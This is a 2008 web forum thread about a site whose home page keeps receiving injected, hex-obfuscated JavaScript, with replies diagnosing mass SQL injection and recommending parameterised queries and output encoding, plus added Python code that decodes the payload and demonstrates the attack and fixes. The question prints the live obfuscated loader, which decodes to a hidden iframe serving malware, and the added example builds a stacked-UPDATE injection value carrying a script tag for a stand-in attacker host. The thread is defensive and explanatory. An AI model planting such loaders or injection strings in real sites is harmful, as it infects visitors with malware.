
new type of injection? rewrite default document?

Question posted by: Brian Bozarth (Guest) on July 11th, 2008 09:25 PM
This is weird. I'm pretty familiar with SQL injection, but we're getting
this weird injection that is writing into the default document or home page.
What it's doing is putting script code at the top or bottom of the home
page. It looks something like this:

<script>function xy1q4877d47d91a36(q4877d47d92209){ function q4877d47d929d5() {return 16;} return (parseInt(q4877d47d92209,q4877d47d929d5()));}
function q4877d47d93974(q4877d47d94144){ var q4877d47d95c9b=2; var q4877d47d94d7f='';q4877d47d96c3a=String.fromCharCode;for(q4877d47d954cc=0;q4877d47d954cc<q4877d47d94144.length;q4877d47d954cc+=q4877d47d95c9b){ q4877d47d94d7f+=(q4877d47d96c3a(xy1q4877d47d91a36(q4877d47d94144.substr(q4877d47d954cc,q4877d47d95c9b))));}return q4877d47d94d7f;}
var q4877d47d9740a='3C7363726970743E696628216D796961297B646F63756D656E742E777269746528756E657363617065282027253363253639253636253732253631253664253635253230253733253732253633253364253237253638253734253734253730253361253266253266253734253732253735253635253732253639253665253637253734253666253665253635253733253265253665253635253734253266253733253635253631253732253633253638253265253633253637253639253366253632253631253631253637253639253732253663262532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533352533352533352533362533372532392532622532372536342533352533322533382532372532302537372536392536342537342536382533642533312533382533312532302536382536352536392536372536382537342533642533332533302533372532302537332537342537392536632536352533642532372536342536392537332537302536632536312537392533612532302536652536662536652536352532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E';
document.write(q4877d47d93974(q4877d47d9740a));</script>

What it's doing is decoding itself into an iframe that links out to popups
that will try to download a virus onto your machine. I don't get the popup
on my machine because I think I have a newer version of IE. But some
people have complained that it is installing a virus on their machine.

Also, what is crazy is that when I replace the file with a good version, in
about 30 minutes it is automatically overwritten with the infected version.
Also, I've noticed it on some other websites that I haven't touched.

Has anyone encountered this before? I'm stumped as to the cause of it. I
don't see the issue on our dev server. It seems to be IIS on a shared host.

Brian
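Added example, not part of Brian's post or of the injected script: a Python decoder that does offline what the posted obfuscator does in the browser, so the payload can be read without rendering the page. Stage 1 is the posted routine (hex taken two characters at a time, parseInt(..., 16), String.fromCharCode); stage 2 is the JavaScript unescape() call the first stage writes out. The hex blob is copied from the post as it appears there; the forum's 50-character wrapping spaces are stripped before decoding. Function names and the odd-length check are my additions.

```python
import re

# The hex blob from the question, copied as posted. The forum software wrapped
# it with spaces every 50 characters; those are transport artefacts, not part
# of the payload, so clean_hex() strips them before decoding.
POSTED_HEX = """
3C7363726970743E696628216D79696129
7B646F63756D656E742E777269746528756E65736361706528
20272533632536392536362537322536312536642536352532
30253733253732253633253364253237253638253734253734
25373025336125326625326625373425373225373525363525
37322536392536652536372537342536662536652536352537
33253265253665253635253734253266253733253635253631
25373225363325363825326525363325363725363925336625
36322536312536312536372536392537322536632625323725
32622534642536312537342536382532652537322536662537
35253665253634253238253464253631253734253638253265
25373225363125366525363425366625366425323825323925
32612533352533352533352533362533372532392532622532
37253634253335253332253338253237253230253737253639
25363425373425363825336425333125333825333125323025
36382536352536392536372536382537342533642533332533
30253337253230253733253734253739253663253635253364
25323725363425363925373325373025366325363125373925
33612532302536652536662536652536352532372533652533
63253266253639253636253732253631253664253635253365
2729293B7D766172206D7969613D747275653B3C2F73637269
70743E
"""


def clean_hex(blob: str) -> str:
    """Drop the whitespace the forum inserted when wrapping the long line."""
    return re.sub(r"\s+", "", blob)


def decode_stage1(hex_blob: str) -> str:
    """What q4877d47d93974() does: two hex digits at a time, parseInt(x, 16),
    then String.fromCharCode. Latin-1 maps each byte to the same char code."""
    h = clean_hex(hex_blob)
    if len(h) % 2:
        raise ValueError("odd-length hex: the payload was truncated or mis-copied")
    return bytes.fromhex(h).decode("latin-1")


def js_unescape(s: str) -> str:
    """JavaScript's unescape(): decodes %XX and %uXXXX; leaves '+' alone
    (unlike URL form decoding), which matters for the Math.random() fragment."""
    def repl(m):
        return chr(int(m.group(1) or m.group(2), 16))
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})", repl, s)


def decode_stage2(stage1: str) -> str:
    """Pull the string literal out of the unescape('...') call written by
    stage 1 and decode it; this is the markup the browser ends up with."""
    m = re.search(r"unescape\(\s*'([^']*)'\s*\)", stage1)
    if not m:
        raise ValueError("no unescape('...') call found in stage 1")
    return js_unescape(m.group(1))


def iframe_src(markup: str):
    """The indicator worth blocking: the src of the hidden iframe, or None."""
    m = re.search(r"<iframe\b[^>]*\bsrc=['\"]([^'\"]*)", markup, re.I)
    return m.group(1) if m else None


if __name__ == "__main__":
    s1 = decode_stage1(POSTED_HEX)
    s2 = decode_stage2(s1)
    print(s1)
    print(s2)
    print("iframe src:", iframe_src(s2))
```

Running it shows that the second stage is a hidden iframe (style='display: none') pointing at a third-party host; that hostname is the thing to block at the proxy and to search the database for, not the ever-changing variable names in the outer wrapper.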


ThatsIT.net.au (Guest), July 13th, 2008 01:55 AM, #2

Re: new type of injection? rewrite default document?
It would seem you have a virus on your machine that is adding the code.

This is just a thought, I don't know if it will work, but try auditing access
to the file. Maybe then you can at least see what user the virus is running
under. Look in your task manager for processes running.




Bob Barrows [MVP] (Guest), July 13th, 2008 12:05 PM, #3

Re: new type of injection? rewrite default document?


Browse through the several threads about sql injection that have been posted
in the last couple weeks. You should find posts that mention these links:

http://www.aspmessageboard.com/foru...4997&P=1#894984
http://isc.sans.org/diary.html?n&storyid=4294
http://blogs.technet.com/neilcar/ar...art-2-meat.aspx

In a nutshell, you've been attacked by a bot that uses Google to find sites
that might be vulnerable to SQL injection, based on the use of querystrings
in the URLs. It then runs through a scripted routine to find the
vulnerabilities in the sites, and if they exist, uses those vulnerabilities
to insert those script tags you are seeing into every table in your
database. Since your code is likely to be writing data retrieved from the
database to Response without validating or encoding it, it's really your
code that is inserting the script tags into your pages.

So the first thing you should do is check the data in your database. If
corrupt, take it offline and restore a backup, or run a stored procedure
which was posted by Old Pedant to attempt to cleanse it. Then, go through
your server-side code with a fine tooth comb and

1. Make your code impervious to sql injection by eliminating all use of
dynamic sql, using parameters instead.
See here for a better, more secure way to execute your queries by using
parameter markers:
http://groups-beta.google.com/group...2e36562fee7804e

Personally, I prefer using stored procedures, or saved parameter queries as
they are known in Access:

Access:
http://www.google.com/groups?hl=en&...FTNGP12.phx.gbl

http://groups.google.com/groups?hl=...ftngp13.phx.gbl


SQL Server:

http://groups.google.com/group/micr...09dc1701?hl=en&


2. Use Server.HTMLEncode when writing data to Response



--
Microsoft MVP - ASP/ASP.NET
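Added example, not code from the thread or from the linked posts: the chain Bob describes and both of his fixes, run against an in-memory SQLite table standing in for the site's SQL Server tables. The table, the page logic, the shortened tag and the attack value are all constructed for illustration; ADO batch execution is emulated with executescript(), since sqlite3's execute() refuses stacked statements. The cleansing routine at the end is my own sketch of what a cleanup procedure does, walking SQLite metadata rather than sysobjects/syscolumns.

```python
import html
import sqlite3

# Constructed stand-in for the injected tag. The real one is the hex-obfuscated
# block in the question; double quotes keep it a valid SQL string literal below.
INJECTED_TAG = '<script src="http://attacker.invalid/x.js"></script>'

# Constructed attack value for the ?id= querystring: the expected number,
# then a stacked UPDATE that appends the tag to every row of the table.
ATTACK_ID = "1; UPDATE products SET blurb = blurb || '" + INJECTED_TAG + "'"


def make_db():
    """Constructed sample table standing in for the site's database."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, blurb TEXT);
        INSERT INTO products(name, blurb) VALUES ('Widget', 'A fine widget');
        INSERT INTO products(name, blurb) VALUES ('Gadget', 'An even finer one');
    """)
    return con


# 1. Dynamic SQL (the vulnerable pattern) versus a parameter marker.

def build_dynamic_sql(raw_id):
    """The pattern Bob warns about: the querystring value is glued into SQL."""
    return "SELECT name, blurb FROM products WHERE id = " + raw_id


def run_batch(con, sql):
    """ADO hands the whole string to SQL Server, which runs it as a batch, so
    a stacked UPDATE in the id value runs too. executescript() emulates that."""
    con.executescript(sql)


def lookup_param(con, raw_id):
    """Same lookup with a parameter: the value is data, never SQL text.
    The attack string is simply a non-numeric id and matches nothing."""
    return con.execute(
        "SELECT name, blurb FROM products WHERE id = ?", (raw_id,)
    ).fetchall()


# 2. Encoding on output (what Server.HTMLEncode does).

def render_unencoded(rows):
    """Response.Write of raw database data: any stored tag goes live."""
    return "".join(f"<li>{name}: {blurb}</li>" for name, blurb in rows)


def render_encoded(rows):
    """Server.HTMLEncode equivalent: stored tags reach the browser as text."""
    return "".join(
        f"<li>{html.escape(name)}: {html.escape(blurb)}</li>" for name, blurb in rows
    )


# 3. Cleansing every text column of every table (the idea behind a cleanup
#    procedure). Removes only the exact tag, so restoring a backup is still
#    the safer course when one exists.

def cleanse(con, tag=INJECTED_TAG):
    """Returns the number of rows changed across all text columns."""
    changed = 0
    tables = [r[0] for r in con.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:
        for _, col, ctype, *_ in con.execute(f'PRAGMA table_info("{table}")'):
            if "CHAR" in ctype.upper() or "TEXT" in ctype.upper():
                cur = con.execute(
                    f'UPDATE "{table}" SET "{col}" = REPLACE("{col}", ?, ?) '
                    f'WHERE instr("{col}", ?) > 0',
                    (tag, "", tag),
                )
                changed += cur.rowcount
    con.commit()
    return changed


if __name__ == "__main__":
    con = make_db()
    run_batch(con, build_dynamic_sql(ATTACK_ID))   # every blurb now carries the tag
    rows = con.execute("SELECT name, blurb FROM products").fetchall()
    print(render_unencoded(rows))                   # tag is emitted live
    print(render_encoded(rows))                     # same data, rendered inert
    print(cleanse(con), "rows cleaned")
    print(lookup_param(make_db(), ATTACK_ID))       # [] with the parameterised query
```

The point the two renderers make is that encoding on output is a second, independent layer: even after the database has been poisoned, Server.HTMLEncode stops the stored tag from executing, while the parameter marker stops it from getting in at all. The 30-minute re-infection Brian sees is consistent with this picture: replacing the file does nothing when the tag is coming out of the database on every request.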


